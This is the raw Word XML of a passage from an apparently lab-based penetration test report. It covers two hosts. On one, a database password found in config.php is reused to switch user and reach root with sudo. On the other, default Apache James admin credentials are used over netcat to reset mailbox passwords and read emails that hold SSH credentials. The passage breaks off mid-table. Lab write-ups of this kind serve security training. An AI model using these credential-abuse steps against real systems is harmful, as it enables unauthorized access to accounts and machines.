                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                  <w:color w:val="C8C3BC"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>http://10.11.1.71/cgi-bin/admin.cgi</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="112CFBEE" w14:textId="77777777" w:rsidR="00BB52B8" w:rsidRPr="00BB52B8" w:rsidRDefault="00BB52B8" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="34978EF5" w14:textId="37D7A369" w:rsidR="00772DF2" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc92471630"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Privilege Escalation – Unsecured Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="66A4C20B" w14:textId="77777777" w:rsidR="00895202" w:rsidRPr="00895202" w:rsidRDefault="00895202" w:rsidP="00895202"/>
    <w:p w14:paraId="5044D004" w14:textId="1E397BE4" w:rsidR="00052FCF" w:rsidRDefault="00895202" w:rsidP="002B5C2F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00B96009">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> have a shell as </w:t>
      </w:r>
      <w:r w:rsidR="00B96009" w:rsidRPr="00E82633">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00B96009">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005435D6">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> therefore,</w:t>
      </w:r>
      <w:r w:rsidR="004A510E">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B96009">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="004A510E">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>verify</w:t>
      </w:r>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> the default Apache directory </w:t>
      </w:r>
      <w:r w:rsidR="005435D6">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">first </w:t>
      </w:r>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">for a </w:t>
      </w:r>
      <w:r w:rsidR="00E82633">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">potential </w:t>
      </w:r>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">presence of unsecured credentials in the configuration files available for this user. We </w:t>
      </w:r>
      <w:r w:rsidR="00B96009">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>locate</w:t>
      </w:r>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00772DF2" w:rsidRPr="005435D6">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> file with the exposed MySQL database password </w:t>
      </w:r>
      <w:r w:rsidR="005435D6">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>zaq1xsw2cde3</w:t>
      </w:r>
      <w:r w:rsidR="005435D6">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00772DF2" w:rsidRPr="00FD5193">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the /var/www/html/templates directory. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700BF848" w14:textId="77777777" w:rsidR="00052FCF" w:rsidRDefault="00052FCF" w:rsidP="002B5C2F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDD6759" w14:textId="77777777" w:rsidR="00052FCF" w:rsidRDefault="00052FCF" w:rsidP="002B5C2F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCEF5D8" w14:textId="219DB470" w:rsidR="002B5C2F" w:rsidRDefault="186B290E" w:rsidP="002B5C2F">
      <w:r>
        <w:t xml:space="preserve">We can reuse this password on one of the user's accounts present on this machine - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. After changing our user with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command, we </w:t>
      </w:r>
      <w:r w:rsidR="00BB52B8">
        <w:t>immediately discovered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that this user takes part of the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ group, meaning that the escalation of privileges was possible using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command once again: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199B1E37" w14:textId="4935B709" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="186B290E" w14:paraId="091014F1" w14:textId="77777777" w:rsidTr="186B290E">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="62C594D8" w14:textId="32B452BF" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="7C1F2418" w14:textId="77777777" w:rsidTr="186B290E">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="22C22BCA" w14:textId="43EB5518" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="C8C3BC"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C1BC7A7" w14:textId="77777777" w:rsidR="00052FCF" w:rsidRDefault="00052FCF" w:rsidP="002B5C2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415C5E88" w14:textId="07FA37CA" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1753AA" w14:textId="77777777" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15"/>
    <w:p w14:paraId="16DB0E8C" w14:textId="62F1921F" w:rsidR="00052FCF" w:rsidRPr="00854D15" w:rsidRDefault="186B290E" w:rsidP="00854D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc92471631"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1F764B5E" w14:textId="77777777" w:rsidR="004A510E" w:rsidRPr="004A510E" w:rsidRDefault="004A510E" w:rsidP="004A510E"/>
    <w:p w14:paraId="638C45D5" w14:textId="3CF01943" w:rsidR="186B290E" w:rsidRPr="00D14E89" w:rsidRDefault="00DF6897" w:rsidP="186B290E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6205F7AE" wp14:editId="7C51478A">
            <wp:extent cx="5943600" cy="22070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2207036"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475A5AD" w14:textId="2543E900" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394E60DE" w14:textId="77777777" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE013A5" w14:textId="547C28D2" w:rsidR="00AE353F" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc92471632"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>10.11.1.72 – Beta</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4C70B2A1" w14:textId="3AB608F2" w:rsidR="00AE353F" w:rsidRDefault="186B290E" w:rsidP="00AE353F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc92471633"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
        <w:t>Initial Access – Unsecured Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481F903" w14:textId="77777777" w:rsidR="00B96009" w:rsidRPr="00B96009" w:rsidRDefault="00B96009" w:rsidP="00B96009">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2560B6" w14:textId="2B19B851" w:rsidR="00AE353F" w:rsidRDefault="00AE353F" w:rsidP="00AE353F">
      <w:r w:rsidRPr="00ED4831">
        <w:t>From the Initial Service Scan</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t xml:space="preserve"> we can observe the presence of several open ports related to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00586B50">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>James</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00586B50">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t xml:space="preserve"> - a mail server maintained by Apache. The most uncommon in this list is Apache's James Remote Administration on port 4555. By interacting with it using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED4831">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED4831">
        <w:t xml:space="preserve"> we confirmed it uses the default credentials </w:t>
      </w:r>
      <w:r w:rsidR="00586B50">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t>root/root</w:t>
      </w:r>
      <w:r w:rsidR="00586B50">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t>.  Utilizing this service</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t xml:space="preserve"> we reset the email address passwords for all the users present on this service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3323D05F" w14:textId="77777777" w:rsidR="00B96009" w:rsidRDefault="00B96009" w:rsidP="00AE353F"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="186B290E" w14:paraId="2DF37742" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="3E3B05C5" w14:textId="292C7421" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10.11.1.72 4555</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="714D956E" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="4B6441F5" w14:textId="1EDFB168" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>setpassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ryuu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EA50A8A" w14:textId="77777777" w:rsidR="00B96009" w:rsidRDefault="00B96009" w:rsidP="00AE353F"/>
    <w:p w14:paraId="2AB5FD83" w14:textId="7F5884A0" w:rsidR="00AE353F" w:rsidRDefault="00AE353F" w:rsidP="00AE353F">
      <w:r w:rsidRPr="00ED4831">
        <w:t xml:space="preserve">After resetting the password, we can log in to the POP3 server on port 111 to read the emails. One of the emails in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00586B50">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ryuu</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t>'s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED4831">
        <w:t xml:space="preserve"> inbox contained the SSH credentials that allowed us the Access on this machine </w:t>
      </w:r>
      <w:r w:rsidR="00586B50">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED4831">
        <w:t>ryuu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED4831">
        <w:t>/QUHqhUPRKXMo4m7k</w:t>
      </w:r>
      <w:r w:rsidR="00586B50">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4831">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB8D554" w14:textId="77777777" w:rsidR="00B96009" w:rsidRDefault="00B96009" w:rsidP="00AE353F"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="186B290E" w14:paraId="45F937FE" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="1A632AD8" w14:textId="5D163341" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="333333"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.11.1.72 110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="69096F1C" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="48FABFC7" w14:textId="7BCA3266" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>USER</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
